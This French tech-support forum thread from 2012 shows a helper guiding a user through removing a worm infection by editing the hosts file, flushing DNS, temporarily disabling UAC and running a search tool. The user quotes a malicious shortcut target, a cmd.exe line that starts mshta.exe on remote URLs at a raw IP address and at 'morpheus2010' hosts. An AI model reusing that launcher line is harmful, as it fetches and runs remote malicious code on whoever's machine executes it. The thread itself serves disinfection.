[Résolu] Infection probable

[pear]

J'ai du mal à lire vos images, trop petites.

 

Je ne vois pas de fichier pourri.

Développez svp.

[belo71]

Les images sont des miniatures : il faut cliquer dessus, puis une fois sur le site qui les héberge il faut cliquer à nouveau dessus.

 

Oui il y a des raccourcis pourris dans Menu démarrer/Tous les programmes. Quand je passe la souris dessus, ça dit "carpeta de archivo". J'ai eu la curiosité d'interroger les liens vers lesquels ils renvoient en regardant dans propriétés : ils renvoient à C:\Windows\system32\cmd.exe /c START mshta.exe "h t t p://187.157.146.149:102/m0rpheus/morpheus2010/msnmsgr.tpl?reload=1334732600318" & start mshta.exe ht tp://morpheus2010.100webspace.net/check2.htm h tt p://morpheus2010.100webspace.net/check2.htm & start %windir%\explorer.exe "C:\Users\marie-caroline\AppData\

 

C'est ce qui me fait ouvrir des fenêtres intempestives, créer des raccourcis sur le bureau et démarrer msn... D'après mes recherches il pourrait s'agir d'un ver Win32/Clofect.A (sources : http://www.eset.eu/encyclopaedia/win32-clofect-a-vipantispyware?lng=en ou http://www.threatexpert.com/report.aspx?md5=ff3c6aad8a1a86520c7d0f5e1fc0de6e)

 

Merci pour le coup de main.

 

Belo.

[pear]

Ok, j'ai pu lire.

 

Rk et Mbam semblent avoir rempli leur office.

Supprimez les fichiers suspects: carpeta de archivo etc..

 

Ouvrez le fichier Hosts

dans windows/system32/drivers/etc

cliquez Propriétés,

décochez lecture seule.

Copiez collez ce qui suit:

 

127.0.0.1 http://morpheus2010

127.0.0.1 http://ndreyesweb

 

enregistrez

recochez lecture seule.

 

démarrer->exécuter->

Copier/coller:

Cmd /k ipconfig /flushdns

 

Et validez

 

Un message de confirmation apparait alors : Cache de Résolution DNS vidé

Modifié le 19 avril 2012 par pear

[belo71]

Bonjour Pear,

 

J'ai un petit souci.

 

 

Ouvrez le fichier Hosts

dans windows/system32/drivers/etc

cliquez Propriétés,

décochez lecture seule.

Copiez collez ce qui suit:

 

127.0.0.1 http://morpheus2010

127.0.0.1 http://ndreyesweb

 

 

 

J'ai ouvert le dossier windows/system32/drivers/etc

 

J'ai cliqué droit sur le fichier Hosts et décoché lecture seule.

 

Ensuite, il faut copier/coller ce qui suit : mais où dois-je le copier ? Dans le fichier Hosts ? Avec quel éditeur dois-je l'ouvrir ? J'ai essayé avec bloc-notes et wordpad, mais j'ai un message d'erreur :

 

 

 

Que fais-je donc alors ?

 

Belo.

[pear]

Le fichier Hosts s'édite avec le bloc notes.

 

Il vaut mieux que tout soit aligné sur la ligne localhost

ensuite fichier->enregistrer etc..

 

Peut-être faut-il que vous cliquiez l'onglet sécurité dans les propriétés pour vous donner les droits sue le fichier.

[belo71]

Peut-être faut-il que vous cliquiez l'onglet sécurité dans les propriétés pour vous donner les droits sue le fichier.

 

A priori il semble que c'est l'antivirus (avira) qui bloque l'écriture sur le fichier...

 

IL faut passer en mode expert et autoriser les modifications sur le fichier hôte

 

Modifié le 19 avril 2012 par belo71

[belo71]

démarrer->exécuter->

Copier/coller:

Cmd /k ipconfig /flushdns

 

J'ai un message qui apparaît :

 

L'opération demandée nécessite une élévation

 

 

Par ailleurs, cet épisode infectieux a modifié le menu contextuel lorsqu'on clique droit sur les dossiers :

 

 

Je n'ose pas cliquer sur "Abrir carpeta" de peur de relancer l'épisode infectieux. Comment faire pour nettoyer ce menu contextuel ?

Modifié le 19 avril 2012 par belo71

[pear]

L'UAC est un système mis en place par Microsoft depuis la version Vista, une alerte s'affiche pour permettre l'élévation de privilèges administrateurs pour permettre les opérations administrateurs (tentative de modifications du systèmes, accès à des fichiers administrateurs etc..).

Ceci peut permettre la protection des infections via par exemple des exploits sur les sites WEB puisque l'infection aura besoin des droits administrateurs pour infecter le système, l'UAC se déclenchera via une alerte, vous pourrez alors empécher l'infection du système en refusant l'élvation de privilèges.

 

 

Certains utilitaires peuvent avoir besoin que l'on désactive temporairement l'UAC pour s'installer.

 

Sous Vista ,Désactiver l'UAC

Pour cela, ouvrez le panneau de configuration puis cliquez en haut à droite sur Comptes d'utilisateurs

Dans Comptes d'utilisateurs, cliquez sur la dernière option Activer ou désactiver le contrôle des comptes d'utilisateurs

Décochez l'option, Utiliser le contrôle des comptes d'utilisateurs pour vous aider à protéger le système

Une popup s'ouvre alors pour vous demander de redémarrer l'ordinateur, cliquez alors sur Redémarrer maintenant

Il faudra réactiver l'UAC afin de protéger votre ordinateur après la procédure en cours.

Pour cela, recocher l'option Utiliser le contrôle des comptes d'utilisateurs pour vous aider à protéger le système

[belo71]

Merci pour le topo Pear.

 

Là, j'ai toujours les mêmes soucis :

 

- dans le menu contextuel

 

- au démarrage, j'ai toujours une fenêtre qui s'ouvre avec les références à Morpheus :

 

[pear]

Télécharger SEAF de C_XX

 

Double-cliquer sur le fichier SEAF.exe

Suivre les instructions à cocher sur cette fenêtre:

Occurences à rechercher, séparées par une virgules ->

Taper

morpheus

Cocher"Chercher également dans le régistre"

Calculer le cheksum:Md5 .

Cocher Informations supplémentaires

Après la recherche un rapport s'affiche à l'écran que vous copiez/collez dans votre réponse.

Il est aussi sauvegardé là:C:\SEAFlog.txt